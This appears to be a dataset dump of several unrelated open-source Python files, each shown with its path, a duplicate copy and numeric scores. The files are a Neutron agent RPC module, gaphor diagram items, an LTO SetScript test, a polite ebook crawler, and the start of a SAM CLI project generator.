'network_type': segment.network_type,
'segmentation_id': segment.segmentation_id,
'physical_network': segment.physical_network,
'fixed_ips': [{'subnet_id': o.subnet_id,
'ip_address': str(o.ip_address)}
for o in port_obj.fixed_ips],
'device_owner': port_obj.device_owner,
'allowed_address_pairs': [{'mac_address': o.mac_address,
'ip_address': o.ip_address}
for o in port_obj.allowed_address_pairs],
'port_security_enabled': getattr(port_obj.security,
'port_security_enabled', True),
'qos_policy_id': port_obj.qos_policy_id,
'network_qos_policy_id': net_qos_policy_id,
'profile': binding.profile,
'security_groups': list(port_obj.security_group_ids)
}
LOG.debug("Returning: %s", entry)
return entry
def get_devices_details_list(self, context, devices, agent_id, host=None):
return [self.get_device_details(context, device, agent_id, host)
for device in devices] | neutron/agent/rpc.py |
from datetime import datetime
import itertools
import netaddr
from neutron_lib.agent import topics
from neutron_lib.api.definitions import portbindings_extended as pb_ext
from neutron_lib.callbacks import events as callback_events
from neutron_lib.callbacks import registry
from neutron_lib.callbacks import resources as callback_resources
from neutron_lib import constants
from neutron_lib.plugins import utils
from neutron_lib import rpc as lib_rpc
from oslo_log import log as logging
import oslo_messaging
from oslo_utils import uuidutils
from neutron.agent import resource_cache
from neutron.api.rpc.callbacks import resources
from neutron.common import _constants as n_const
from neutron import objects
LOG = logging.getLogger(__name__)
BINDING_DEACTIVATE = 'binding_deactivate'
def create_consumers(endpoints, prefix, topic_details, start_listening=True):
"""Create agent RPC consumers.
:param endpoints: The list of endpoints to process the incoming messages.
:param prefix: Common prefix for the plugin/agent message queues.
:param topic_details: A list of topics. Each topic has a name, an
operation, and an optional host param keying the
subscription to topic.host for plugin calls.
:param start_listening: if True, it starts the processing loop
:returns: A common Connection.
"""
connection = lib_rpc.Connection()
for details in topic_details:
topic, operation, node_name = itertools.islice(
itertools.chain(details, [None]), 3)
topic_name = topics.get_topic_name(prefix, topic, operation)
connection.create_consumer(topic_name, endpoints, fanout=True)
if node_name:
node_topic_name = '%s.%s' % (topic_name, node_name)
connection.create_consumer(node_topic_name,
endpoints,
fanout=False)
if start_listening:
connection.consume_in_threads()
return connection
class PluginReportStateAPI(object):
"""RPC client used to report state back to plugin.
This class implements the client side of an rpc interface. The server side
can be found in neutron.db.agents_db.AgentExtRpcCallback. For more
information on changing rpc interfaces, see
doc/source/contributor/internals/rpc_api.rst.
"""
def __init__(self, topic):
target = oslo_messaging.Target(topic=topic, version='1.2',
namespace=constants.RPC_NAMESPACE_STATE)
self.client = lib_rpc.get_client(target)
def has_alive_neutron_server(self, context, **kwargs):
cctxt = self.client.prepare()
return cctxt.call(context, 'has_alive_neutron_server', **kwargs)
def report_state(self, context, agent_state, use_call=False):
cctxt = self.client.prepare(
timeout=lib_rpc.TRANSPORT.conf.rpc_response_timeout)
# add unique identifier to a report
# that can be logged on server side.
# This create visible correspondence between events on
# the agent and on the server
agent_state['uuid'] = uuidutils.generate_uuid()
kwargs = {
'agent_state': {'agent_state': agent_state},
'time': datetime.utcnow().strftime(constants.ISO8601_TIME_FORMAT),
}
method = cctxt.call if use_call else cctxt.cast
return method(context, 'report_state', **kwargs)
class PluginApi(object):
'''Agent side of the rpc API.
API version history:
1.0 - Initial version.
1.3 - get_device_details rpc signature upgrade to obtain 'host' and
return value to include fixed_ips and device_owner for
the device port
1.4 - tunnel_sync rpc signature upgrade to obtain 'host'
1.5 - Support update_device_list and
get_devices_details_list_and_failed_devices
'''
def __init__(self, topic):
target = oslo_messaging.Target(topic=topic, version='1.0')
self.client = lib_rpc.get_client(target)
def get_device_details(self, context, device, agent_id, host=None):
cctxt = self.client.prepare()
return cctxt.call(context, 'get_device_details', device=device,
agent_id=agent_id, host=host)
def get_devices_details_list(self, context, devices, agent_id, host=None):
cctxt = self.client.prepare(version='1.3')
return cctxt.call(context, 'get_devices_details_list',
devices=devices, agent_id=agent_id, host=host)
def get_devices_details_list_and_failed_devices(self, context, devices,
agent_id, host=None):
"""Get devices details and the list of devices that failed.
This method returns the devices details. If an error is thrown when
retrieving the devices details, the device is put in a list of
failed devices.
"""
cctxt = self.client.prepare(version='1.5')
return cctxt.call(
context,
'get_devices_details_list_and_failed_devices',
devices=devices, agent_id=agent_id, host=host)
def update_device_down(self, context, device, agent_id, host=None):
cctxt = self.client.prepare()
return cctxt.call(context, 'update_device_down', device=device,
agent_id=agent_id, host=host)
def update_device_up(self, context, device, agent_id, host=None):
cctxt = self.client.prepare()
return cctxt.call(context, 'update_device_up', device=device,
agent_id=agent_id, host=host)
def update_device_list(self, context, devices_up, devices_down,
agent_id, host, agent_restarted=False):
cctxt = self.client.prepare(version='1.5')
ret_devices_up = []
failed_devices_up = []
ret_devices_down = []
failed_devices_down = []
step = n_const.RPC_RES_PROCESSING_STEP
devices_up = list(devices_up)
devices_down = list(devices_down)
for i in range(0, max(len(devices_up), len(devices_down)), step):
# Divide-and-conquer RPC timeout
ret = cctxt.call(context, 'update_device_list',
devices_up=devices_up[i:i + step],
devices_down=devices_down[i:i + step],
agent_id=agent_id, host=host,
agent_restarted=agent_restarted)
ret_devices_up.extend(ret.get("devices_up", []))
failed_devices_up.extend(ret.get("failed_devices_up", []))
ret_devices_down.extend(ret.get("devices_down", []))
failed_devices_down.extend(ret.get("failed_devices_down", []))
return {'devices_up': ret_devices_up,
'failed_devices_up': failed_devices_up,
'devices_down': ret_devices_down,
'failed_devices_down': failed_devices_down}
def tunnel_sync(self, context, tunnel_ip, tunnel_type=None, host=None):
cctxt = self.client.prepare(version='1.4')
return cctxt.call(context, 'tunnel_sync', tunnel_ip=tunnel_ip,
tunnel_type=tunnel_type, host=host)
def create_cache_for_l2_agent():
"""Create a push-notifications cache for L2 agent related resources."""
objects.register_objects()
resource_types = [
resources.PORT,
resources.SECURITYGROUP,
resources.SECURITYGROUPRULE,
resources.NETWORK,
resources.SUBNET
]
rcache = resource_cache.RemoteResourceCache(resource_types)
rcache.start_watcher()
return rcache
class CacheBackedPluginApi(PluginApi):
def __init__(self, *args, **kwargs):
super(CacheBackedPluginApi, self).__init__(*args, **kwargs)
self.remote_resource_cache = create_cache_for_l2_agent()
def register_legacy_notification_callbacks(self, legacy_interface):
"""Emulates the server-side notifications from ml2 AgentNotifierApi.
legacy_interface is an object with 'delete'/'update' methods for
core resources.
"""
self._legacy_interface = legacy_interface
for e in (callback_events.AFTER_UPDATE, callback_events.AFTER_DELETE):
for r in (resources.PORT, resources.NETWORK):
registry.subscribe(self._legacy_notifier, r, e)
def _legacy_notifier(self, rtype, event, trigger, context, resource_id,
**kwargs):
"""Checks if legacy interface is expecting calls for resource.
looks for port_update, network_delete, etc and calls them with
the payloads the handlers are expecting (an ID).
"""
rtype = rtype.lower() # all legacy handlers don't camelcase
method, host_with_activation, host_with_deactivation = (
self._get_method_host(rtype, event, **kwargs))
if not hasattr(self._legacy_interface, method):
# TODO(kevinbenton): once these notifications are stable, emit
# a deprecation warning for legacy handlers
return
# If there is a binding deactivation, we must also notify the
# corresponding activation
if method == BINDING_DEACTIVATE:
self._legacy_interface.binding_deactivate(
context, port_id=resource_id, host=host_with_deactivation)
self._legacy_interface.binding_activate(
context, port_id=resource_id, host=host_with_activation)
else:
payload = {rtype: {'id': resource_id},
'%s_id' % rtype: resource_id}
getattr(self._legacy_interface, method)(context, **payload)
def _get_method_host(self, rtype, event, **kwargs):
"""Constructs the name of method to be called in the legacy interface.
If the event received is a port update that contains a binding
activation where a previous binding is deactivated, the method name
is 'binding_deactivate' and the host where the binding has to be
deactivated is returned. Otherwise, the method name is constructed from
rtype and the event received and the host is None.
"""
is_delete = event == callback_events.AFTER_DELETE
suffix = 'delete' if is_delete else 'update'
method = "%s_%s" % (rtype, suffix)
host_with_activation = None
host_with_deactivation = None
if is_delete or rtype != callback_resources.PORT:
return method, host_with_activation, host_with_deactivation
# A port update was received. Find out if it is a binding activation
# where a previous binding was deactivated
BINDINGS = pb_ext.COLLECTION_NAME
if BINDINGS in kwargs.get('changed_fields', set()):
existing_active_binding = (
utils.get_port_binding_by_status_and_host(
getattr(kwargs['existing'], 'bindings', []),
constants.ACTIVE))
updated_active_binding = (
utils.get_port_binding_by_status_and_host(
getattr(kwargs['updated'], 'bindings', []),
constants.ACTIVE))
if (existing_active_binding and updated_active_binding and
existing_active_binding.host !=
updated_active_binding.host):
if (utils.get_port_binding_by_status_and_host(
getattr(kwargs['updated'], 'bindings', []),
constants.INACTIVE,
host=existing_active_binding.host)):
method = BINDING_DEACTIVATE
host_with_activation = updated_active_binding.host
host_with_deactivation = existing_active_binding.host
return method, host_with_activation, host_with_deactivation
def get_devices_details_list_and_failed_devices(self, context, devices,
agent_id, host=None):
result = {'devices': [], 'failed_devices': []}
for device in devices:
try:
result['devices'].append(
self.get_device_details(context, device, agent_id, host))
except Exception:
LOG.exception("Failed to get details for device %s", device)
result['failed_devices'].append(device)
return result
def get_device_details(self, context, device, agent_id, host=None):
port_obj = self.remote_resource_cache.get_resource_by_id(
resources.PORT, device)
if not port_obj:
LOG.debug("Device %s does not exist in cache.", device)
return {'device': device}
if not port_obj.binding_levels:
LOG.warning("Device %s is not bound.", port_obj)
return {'device': device}
segment = port_obj.binding_levels[-1].segment
if not segment:
LOG.debug("Device %s is not bound to any segment.", port_obj)
return {'device': device}
binding = utils.get_port_binding_by_status_and_host(
port_obj.bindings, constants.ACTIVE, raise_if_not_found=True,
port_id=port_obj.id)
if (port_obj.device_owner.startswith(
constants.DEVICE_OWNER_COMPUTE_PREFIX) and
binding[pb_ext.HOST] != host):
LOG.debug("Device %s has no active binding in this host",
port_obj)
return {'device': device,
constants.NO_ACTIVE_BINDING: True}
net = self.remote_resource_cache.get_resource_by_id(
resources.NETWORK, port_obj.network_id)
net_qos_policy_id = net.qos_policy_id
# match format of old RPC interface
mac_addr = str(netaddr.EUI(str(port_obj.mac_address),
dialect=netaddr.mac_unix_expanded))
entry = {
'device': device,
'network_id': port_obj.network_id,
'port_id': port_obj.id,
'mac_address': mac_addr,
'admin_state_up': port_obj.admin_state_up,
'network_type': segment.network_type,
'segmentation_id': segment.segmentation_id,
'physical_network': segment.physical_network,
'fixed_ips': [{'subnet_id': o.subnet_id,
'ip_address': str(o.ip_address)}
for o in port_obj.fixed_ips],
'device_owner': port_obj.device_owner,
'allowed_address_pairs': [{'mac_address': o.mac_address,
'ip_address': o.ip_address}
for o in port_obj.allowed_address_pairs],
'port_security_enabled': getattr(port_obj.security,
'port_security_enabled', True),
'qos_policy_id': port_obj.qos_policy_id,
'network_qos_policy_id': net_qos_policy_id,
'profile': binding.profile,
'security_groups': list(port_obj.security_group_ids)
}
LOG.debug("Returning: %s", entry)
return entry
def get_devices_details_list(self, context, devices, agent_id, host=None):
return [self.get_device_details(context, device, agent_id, host)
for device in devices] | 0.782164 | 0.097519 |
import ast
from typing import Optional
from gaphas.canvas import Canvas
from gaphas.item import NW, Element
from gaphas.item import Line as _Line
from gaphas.util import path_ellipse
class SimpleItem:
"""
Marker for simple (non-Presentation) diagram items.
"""
canvas: Optional[Canvas]
def save(self, save_func):
...
def load(self, name, value):
...
def postload(self):
...
def unlink(self):
"""
Remove the item from the canvas.
"""
if self.canvas:
self.canvas.remove(self)
class Line(_Line, SimpleItem):
def __init__(self, id=None, model=None):
super().__init__()
self.style = {"line-width": 2, "color": (0, 0, 0, 1)}.__getitem__
self._id = id
self.fuzziness = 2
self._handles[0].connectable = False
self._handles[-1].connectable = False
id = property(lambda self: self._id, doc="Id")
def save(self, save_func):
save_func("matrix", tuple(self.matrix))
for prop in ("orthogonal", "horizontal"):
save_func(prop, getattr(self, prop))
points = [tuple(map(float, h.pos)) for h in self.handles()]
save_func("points", points)
def load(self, name, value):
if name == "matrix":
self.matrix = ast.literal_eval(value)
elif name == "points":
points = ast.literal_eval(value)
for x in range(len(points) - 2):
h = self._create_handle((0, 0))
self._handles.insert(1, h)
for i, p in enumerate(points):
self.handles()[i].pos = p
self._update_ports()
elif name == "horizontal":
self.horizontal = ast.literal_eval(value)
elif name == "orthogonal":
self._load_orthogonal = ast.literal_eval(value)
def postload(self):
if hasattr(self, "_load_orthogonal"):
self.orthogonal = self._load_orthogonal
del self._load_orthogonal
def draw(self, context):
cr = context.cairo
style = self.style
cr.set_line_width(style("line-width"))
cr.set_source_rgba(*style("color"))
super().draw(context)
class Box(Element, SimpleItem):
"""
A Box has 4 handles (for a start)::
NW +---+ NE
SW +---+ SE
"""
def __init__(self, id=None, model=None):
super().__init__(10, 10)
self.style = {"line-width": 2, "color": (0, 0, 0, 1)}.__getitem__
self._id = id
id = property(lambda self: self._id, doc="Id")
def save(self, save_func):
save_func("matrix", tuple(self.matrix))
save_func("width", self.width)
save_func("height", self.height)
def load(self, name, value):
if name == "matrix":
self.matrix = ast.literal_eval(value)
elif name == "width":
self.width = ast.literal_eval(value)
elif name == "height":
self.height = ast.literal_eval(value)
def postload(self):
pass
def draw(self, context):
cr = context.cairo
nw = self._handles[NW]
style = self.style
cr.rectangle(nw.pos.x, nw.pos.y, self.width, self.height)
# cr.set_source_rgba(*style("color"))
# cr.fill_preserve()
cr.set_source_rgba(*style("color"))
cr.set_line_width(style("line-width"))
cr.stroke()
class Ellipse(Element, SimpleItem):
"""
"""
def __init__(self, id=None, model=None):
super().__init__()
self.style = {"line-width": 2, "color": (0, 0, 0, 1)}.__getitem__
self._id = id
id = property(lambda self: self._id, doc="Id")
def save(self, save_func):
save_func("matrix", tuple(self.matrix))
save_func("width", self.width)
save_func("height", self.height)
def load(self, name, value):
if name == "matrix":
self.matrix = ast.literal_eval(value)
elif name == "width":
self.width = ast.literal_eval(value)
elif name == "height":
self.height = ast.literal_eval(value)
def postload(self):
pass
def draw(self, context):
cr = context.cairo
style = self.style
rx = self.width / 2.0
ry = self.height / 2.0
cr.move_to(self.width, ry)
path_ellipse(cr, rx, ry, self.width, self.height)
cr.set_source_rgba(*style("color"))
cr.set_line_width(style("line-width"))
cr.stroke() | gaphor/diagram/general/simpleitem.py | import ast
from typing import Optional
from gaphas.canvas import Canvas
from gaphas.item import NW, Element
from gaphas.item import Line as _Line
from gaphas.util import path_ellipse
class SimpleItem:
"""
Marker for simple (non-Presentation) diagram items.
"""
canvas: Optional[Canvas]
def save(self, save_func):
...
def load(self, name, value):
...
def postload(self):
...
def unlink(self):
"""
Remove the item from the canvas.
"""
if self.canvas:
self.canvas.remove(self)
class Line(_Line, SimpleItem):
def __init__(self, id=None, model=None):
super().__init__()
self.style = {"line-width": 2, "color": (0, 0, 0, 1)}.__getitem__
self._id = id
self.fuzziness = 2
self._handles[0].connectable = False
self._handles[-1].connectable = False
id = property(lambda self: self._id, doc="Id")
def save(self, save_func):
save_func("matrix", tuple(self.matrix))
for prop in ("orthogonal", "horizontal"):
save_func(prop, getattr(self, prop))
points = [tuple(map(float, h.pos)) for h in self.handles()]
save_func("points", points)
def load(self, name, value):
if name == "matrix":
self.matrix = ast.literal_eval(value)
elif name == "points":
points = ast.literal_eval(value)
for x in range(len(points) - 2):
h = self._create_handle((0, 0))
self._handles.insert(1, h)
for i, p in enumerate(points):
self.handles()[i].pos = p
self._update_ports()
elif name == "horizontal":
self.horizontal = ast.literal_eval(value)
elif name == "orthogonal":
self._load_orthogonal = ast.literal_eval(value)
def postload(self):
if hasattr(self, "_load_orthogonal"):
self.orthogonal = self._load_orthogonal
del self._load_orthogonal
def draw(self, context):
cr = context.cairo
style = self.style
cr.set_line_width(style("line-width"))
cr.set_source_rgba(*style("color"))
super().draw(context)
class Box(Element, SimpleItem):
"""
A Box has 4 handles (for a start)::
NW +---+ NE
SW +---+ SE
"""
def __init__(self, id=None, model=None):
super().__init__(10, 10)
self.style = {"line-width": 2, "color": (0, 0, 0, 1)}.__getitem__
self._id = id
id = property(lambda self: self._id, doc="Id")
def save(self, save_func):
save_func("matrix", tuple(self.matrix))
save_func("width", self.width)
save_func("height", self.height)
def load(self, name, value):
if name == "matrix":
self.matrix = ast.literal_eval(value)
elif name == "width":
self.width = ast.literal_eval(value)
elif name == "height":
self.height = ast.literal_eval(value)
def postload(self):
pass
def draw(self, context):
cr = context.cairo
nw = self._handles[NW]
style = self.style
cr.rectangle(nw.pos.x, nw.pos.y, self.width, self.height)
# cr.set_source_rgba(*style("color"))
# cr.fill_preserve()
cr.set_source_rgba(*style("color"))
cr.set_line_width(style("line-width"))
cr.stroke()
class Ellipse(Element, SimpleItem):
"""
"""
def __init__(self, id=None, model=None):
super().__init__()
self.style = {"line-width": 2, "color": (0, 0, 0, 1)}.__getitem__
self._id = id
id = property(lambda self: self._id, doc="Id")
def save(self, save_func):
save_func("matrix", tuple(self.matrix))
save_func("width", self.width)
save_func("height", self.height)
def load(self, name, value):
if name == "matrix":
self.matrix = ast.literal_eval(value)
elif name == "width":
self.width = ast.literal_eval(value)
elif name == "height":
self.height = ast.literal_eval(value)
def postload(self):
pass
def draw(self, context):
cr = context.cairo
style = self.style
rx = self.width / 2.0
ry = self.height / 2.0
cr.move_to(self.width, ry)
path_ellipse(cr, rx, ry, self.width, self.height)
cr.set_source_rgba(*style("color"))
cr.set_line_width(style("line-width"))
cr.stroke() | 0.807574 | 0.292772 |
from LTO.Transactions.SetScript import SetScript
from LTO.Accounts.AccountFactoryED25519 import AccountED25519 as AccountFactory
from time import time
from unittest import mock
class TestSetScript:
ACCOUNT_SEED = "df3dd6d884714288a39af0bd973a1771c9f00f168cf040d6abb6a50dd5e055d8"
account = AccountFactory('T').createFromSeed(ACCOUNT_SEED)
def testConstruct(self):
transaction = SetScript(b'aGVsbG8=')
assert transaction.script == b'aGVsbG8='
assert transaction.txFee == 500000000
def testSignWith(self):
transaction = SetScript(b'aGVsbG8=')
assert transaction.isSigned() is False
transaction.signWith(self.account)
assert transaction.isSigned() is True
timestamp = int(time() * 1000)
assert str(transaction.timestamp)[:-3] == str(timestamp)[:-3]
assert transaction.sender == '<KEY>'
assert transaction.senderPublicKey == '<KEY>'
assert self.account.verifySignature(transaction.toBinary(), transaction.proofs[0])
def expectedV1(self):
return {
"type": 13,
"version": 1,
"sender": '<KEY>',
"senderPublicKey": '<KEY>',
"fee": 500000000,
"timestamp": 1609773456000,
"script": 'base64:' + str(b'aGVsbG8='),
"proofs": ['Z5dX5Upqq8ergHPhi4J2qLTroLKzUUdf3yR36Ns9oiASs6nWKdDHacD4W2WzweQczJaUCogrBZ6xMhMi1vKMXky']
}
def expectedV3(self):
return {
"type": 13,
"version": 3,
"sender": '3MtHYnCkd3oFZr21yb2vEdngcSG<KEY>',
"senderKeyType": "ed25519",
"senderPublicKey": '<KEY>',
"fee": 500000000,
"timestamp": 1609773456000,
"script": 'base64:' + str(b'aGVsbG8='),
"proofs": ['<KEY>']
}
def testToJson(self):
transaction = SetScript(b'aGVsbG8=')
transaction.timestamp = 1609773456000
transaction.signWith(self.account)
if transaction.version == 1:
expected = self.expectedV1()
elif transaction.version == 3:
expected = self.expectedV3()
else:
expected = ''
assert transaction.toJson() == expected
@mock.patch('src.LTO.PublicNode')
def testBroadcast(self, mock_Class):
transaction = SetScript(b'aGVsbG8=')
broadcastedTransaction = SetScript(b'aGVsbG8=')
broadcastedTransaction.id = '7cCeL1qwd9i6u8NgMNsQjBPxVhrME2BbfZMT1DF9p4Yi'
mc = mock_Class.return_value
mc.broadcast.return_value = broadcastedTransaction
assert mc.broadcast(transaction) == broadcastedTransaction
def testFromData(self):
data = {
"type": 13,
"version": 1,
"id": 'BG7MQF8KffVU6MMbJW5xPowVQsohwJhfEJ4wSF8cWdC2',
"sender": '3MtHYnCkd3oFZr21yb2vEdngcSGXvuNNCq2',
"senderKeyType": "ed25519",
"senderPublicKey": '<KEY>',
"fee": 500000000,
"timestamp": 1609773456000,
"script": b'aGVsbG8=',
"proofs": ['<KEY>']
}
transaction = SetScript(data['script']).fromData(data)
for key in data:
assert data[key] == transaction.__getattr__(key) | tests/Transactions/SetScriptTest.py | from LTO.Transactions.SetScript import SetScript
from LTO.Accounts.AccountFactoryED25519 import AccountED25519 as AccountFactory
from time import time
from unittest import mock
class TestSetScript:
ACCOUNT_SEED = "df3dd6d884714288a39af0bd973a1771c9f00f168cf040d6abb6a50dd5e055d8"
account = AccountFactory('T').createFromSeed(ACCOUNT_SEED)
def testConstruct(self):
transaction = SetScript(b'aGVsbG8=')
assert transaction.script == b'aGVsbG8='
assert transaction.txFee == 500000000
def testSignWith(self):
transaction = SetScript(b'aGVsbG8=')
assert transaction.isSigned() is False
transaction.signWith(self.account)
assert transaction.isSigned() is True
timestamp = int(time() * 1000)
assert str(transaction.timestamp)[:-3] == str(timestamp)[:-3]
assert transaction.sender == '<KEY>'
assert transaction.senderPublicKey == '<KEY>'
assert self.account.verifySignature(transaction.toBinary(), transaction.proofs[0])
def expectedV1(self):
return {
"type": 13,
"version": 1,
"sender": '<KEY>',
"senderPublicKey": '<KEY>',
"fee": 500000000,
"timestamp": 1609773456000,
"script": 'base64:' + str(b'aGVsbG8='),
"proofs": ['Z5dX5Upqq8ergHPhi4J2qLTroLKzUUdf3yR36Ns9oiASs6nWKdDHacD4W2WzweQczJaUCogrBZ6xMhMi1vKMXky']
}
def expectedV3(self):
return {
"type": 13,
"version": 3,
"sender": '3MtHYnCkd3oFZr21yb2vEdngcSG<KEY>',
"senderKeyType": "ed25519",
"senderPublicKey": '<KEY>',
"fee": 500000000,
"timestamp": 1609773456000,
"script": 'base64:' + str(b'aGVsbG8='),
"proofs": ['<KEY>']
}
def testToJson(self):
transaction = SetScript(b'aGVsbG8=')
transaction.timestamp = 1609773456000
transaction.signWith(self.account)
if transaction.version == 1:
expected = self.expectedV1()
elif transaction.version == 3:
expected = self.expectedV3()
else:
expected = ''
assert transaction.toJson() == expected
@mock.patch('src.LTO.PublicNode')
def testBroadcast(self, mock_Class):
transaction = SetScript(b'aGVsbG8=')
broadcastedTransaction = SetScript(b'aGVsbG8=')
broadcastedTransaction.id = '7cCeL1qwd9i6u8NgMNsQjBPxVhrME2BbfZMT1DF9p4Yi'
mc = mock_Class.return_value
mc.broadcast.return_value = broadcastedTransaction
assert mc.broadcast(transaction) == broadcastedTransaction
def testFromData(self):
data = {
"type": 13,
"version": 1,
"id": 'BG7MQF8KffVU6MMbJW5xPowVQsohwJhfEJ4wSF8cWdC2',
"sender": '3MtHYnCkd3oFZr21yb2vEdngcSGXvuNNCq2',
"senderKeyType": "ed25519",
"senderPublicKey": '<KEY>',
"fee": 500000000,
"timestamp": 1609773456000,
"script": b'aGVsbG8=',
"proofs": ['<KEY>']
}
transaction = SetScript(data['script']).fromData(data)
for key in data:
assert data[key] == transaction.__getattr__(key) | 0.572245 | 0.437403 |
# 実行方法
# python python_crawler_final_bs4.py
import re
import time
from typing import Iterator
import requests
from pymongo import MongoClient
from urllib.parse import urljoin
from bs4 import BeautifulSoup
def main():
"""
クローラーのメインの処理。
"""
client = MongoClient('localhost', 27017) # ローカルホストのMongoDBに接続する。
collection = client.scraping.ebooks # scrapingデータベースのebooksコレクションを得る。
# データを一意に識別するキーを格納するkeyフィールドにユニークなインデックスを作成する。
collection.create_index('key', unique=True)
session = requests.Session()
response = session.get('https://gihyo.jp/dp') # 一覧ページを取得する。
urls = scrape_list_page(response) # 詳細ページのURL一覧を得る。
for url in urls:
key = extract_key(url) # URLからキーを取得する。
ebook = collection.find_one({'key': key}) # MongoDBからkeyに該当するデータを探す。
if not ebook: # MongoDBに存在しない場合だけ、詳細ページをクロールする。
time.sleep(1)
response = session.get(url) # 詳細ページを取得する。
ebook = scrape_detail_page(response)
collection.insert_one(ebook) # 電子書籍の情報をMongoDBに保存する。
print(ebook) # 電子書籍の情報を表示する。
def scrape_list_page(response: requests.Response) -> Iterator[str]:
"""
一覧ページのResponseから詳細ページのURLを抜き出すジェネレーター関数。
"""
soup = BeautifulSoup(response.text, 'html.parser')
for a in soup.select('#listBook > li > a[itemprop="url"]'):
url = urljoin(response.url, a.get('href')) # 絶対URLに変換する。
yield url
def scrape_detail_page(response: requests.Response) -> dict:
"""
詳細ページのResponseから電子書籍の情報をdictで取得する。
"""
soup = BeautifulSoup(response.text, 'html.parser')
ebook = {
'url': response.url, # URL
'key': extract_key(response.url), # URLから抜き出したキー
'title': soup.select_one('#bookTitle').text, # タイトル。select_one()はselect()の結果の最初の要素を取得するメソッド。
'price': soup.select_one('.buy').contents[0].strip(), # 価格(strip()で前後の空白を削除)
'content': [normalize_spaces(h3.text) for h3 in soup.select('#content > h3')], # 目次
}
return ebook # dictを返す。
def extract_key(url: str) -> str:
"""
URLからキー(URLの末尾のISBN)を抜き出す。
"""
m = re.search(r'/([^/]+)$', url) # 最後の/から文字列末尾までを正規表現で取得。
return m.group(1)
def normalize_spaces(s: str) -> str:
"""
連続する空白を1つのスペースに置き換え、前後の空白を削除した新しい文字列を取得する。
"""
return re.sub(r'\s+', ' ', s).strip()
if __name__ == '__main__':
main() | crawling_scraping/crawler/python_crawler_final_bs4.py |
# 実行方法
# python python_crawler_final_bs4.py
import re
import time
from typing import Iterator
import requests
from pymongo import MongoClient
from urllib.parse import urljoin
from bs4 import BeautifulSoup
def main():
"""
クローラーのメインの処理。
"""
client = MongoClient('localhost', 27017) # ローカルホストのMongoDBに接続する。
collection = client.scraping.ebooks # scrapingデータベースのebooksコレクションを得る。
# データを一意に識別するキーを格納するkeyフィールドにユニークなインデックスを作成する。
collection.create_index('key', unique=True)
session = requests.Session()
response = session.get('https://gihyo.jp/dp') # 一覧ページを取得する。
urls = scrape_list_page(response) # 詳細ページのURL一覧を得る。
for url in urls:
key = extract_key(url) # URLからキーを取得する。
ebook = collection.find_one({'key': key}) # MongoDBからkeyに該当するデータを探す。
if not ebook: # MongoDBに存在しない場合だけ、詳細ページをクロールする。
time.sleep(1)
response = session.get(url) # 詳細ページを取得する。
ebook = scrape_detail_page(response)
collection.insert_one(ebook) # 電子書籍の情報をMongoDBに保存する。
print(ebook) # 電子書籍の情報を表示する。
def scrape_list_page(response: requests.Response) -> Iterator[str]:
"""
一覧ページのResponseから詳細ページのURLを抜き出すジェネレーター関数。
"""
soup = BeautifulSoup(response.text, 'html.parser')
for a in soup.select('#listBook > li > a[itemprop="url"]'):
url = urljoin(response.url, a.get('href')) # 絶対URLに変換する。
yield url
def scrape_detail_page(response: requests.Response) -> dict:
"""
詳細ページのResponseから電子書籍の情報をdictで取得する。
"""
soup = BeautifulSoup(response.text, 'html.parser')
ebook = {
'url': response.url, # URL
'key': extract_key(response.url), # URLから抜き出したキー
'title': soup.select_one('#bookTitle').text, # タイトル。select_one()はselect()の結果の最初の要素を取得するメソッド。
'price': soup.select_one('.buy').contents[0].strip(), # 価格(strip()で前後の空白を削除)
'content': [normalize_spaces(h3.text) for h3 in soup.select('#content > h3')], # 目次
}
return ebook # dictを返す。
def extract_key(url: str) -> str:
"""
URLからキー(URLの末尾のISBN)を抜き出す。
"""
m = re.search(r'/([^/]+)$', url) # 最後の/から文字列末尾までを正規表現で取得。
return m.group(1)
def normalize_spaces(s: str) -> str:
"""
連続する空白を1つのスペースに置き換え、前後の空白を削除した新しい文字列を取得する。
"""
return re.sub(r'\s+', ' ', s).strip()
if __name__ == '__main__':
main() | 0.41182 | 0.210604 |
import itertools
import logging
from cookiecutter.exceptions import CookiecutterException
from cookiecutter.main import cookiecutter
from samcli.local.common.runtime_template import RUNTIME_DEP_TEMPLATE_MAPPING
from samcli.local.init.exceptions import GenerateProjectFailedError
LOG = logging.getLogger(__name__)
def generate_project(
location=None, runtime="nodejs10.x", dependency_manager=None, output_dir=".", name="sam-sample-app", no_input=False
):
"""Generates project using cookiecutter and options given
Generate project scaffolds a project using default templates if user
doesn't provide one via location parameter. Default templates are
automatically chosen depending on runtime given by the user.
Parameters
----------
location: Path, optional
Git, HTTP, Local path or Zip containing cookiecutter template
(the default is None, which means no custom template)
runtime: str, optional
Lambda Runtime (the default is "nodejs", which creates a nodejs project)
dependency_manager: str, optional
Dependency Manager for the Lambda Runtime Project(the default is "npm" for a "nodejs" Lambda runtime)
output_dir: str, optional
Output directory where project should be generated
(the default is ".", which implies current folder)
name: str, optional
Name of the project
(the default is "sam-sample-app", which implies a project named sam-sample-app will be created)
no_input : bool, optional
Whether to prompt for input or to accept default values
(the default is False, which prompts the user for values it doesn't know for baking)
Raises
------
GenerateProjectFailedError
If the process of baking a project fails
"""
template = None
for mapping in list(itertools.chain(*(RUNTIME_DEP_TEMPLATE_MAPPING.values()))):
if runtime in mapping["runtimes"] or any([r.startswith(runtime) for r in mapping["runtimes"]]):
if not dependency_manager or dependency_manager == mapping["dependency_manager"]:
template = mapping["init_location"]
break
if not template:
msg = "Lambda Runtime {} does not support dependency manager: {}".format(runtime, dependency_manager)
raise GenerateProjectFailedError(project=name, provider_error=msg)
params = {"template": location if location else template, "output_dir": output_dir, "no_input": no_input}
LOG.debug("Parameters dict created with input given")
LOG.debug("%s", params)
if not location and name is not None:
params["extra_context"] = {"project_name": name, "runtime": runtime}
params["no_input"] = True
LOG.debug("Parameters dict updated with project name as extra_context")
LOG.debug("%s", params)
try:
LOG.debug("Baking a new template with cookiecutter with all parameters")
cookiecutter(**params)
except CookiecutterException as e:
raise GenerateProjectFailedError(project=name, provider_error=e) | samcli/local/init/__init__.py | import itertools
import logging
from cookiecutter.exceptions import CookiecutterException
from cookiecutter.main import cookiecutter
from samcli.local.common.runtime_template import RUNTIME_DEP_TEMPLATE_MAPPING
from samcli.local.init.exceptions import GenerateProjectFailedError
LOG = logging.getLogger(__name__)
def generate_project(
location=None, runtime="nodejs10.x", dependency_manager=None, output_dir=".", name="sam-sample-app", no_input=False
):
"""Generates project using cookiecutter and options given
Generate project scaffolds a project using default templates if user
doesn't provide one via location parameter. Default templates are
automatically chosen depending on runtime given by the user.
Parameters
----------
location: Path, optional
Git, HTTP, Local path or Zip containing cookiecutter template
(the default is None, which means no custom template)
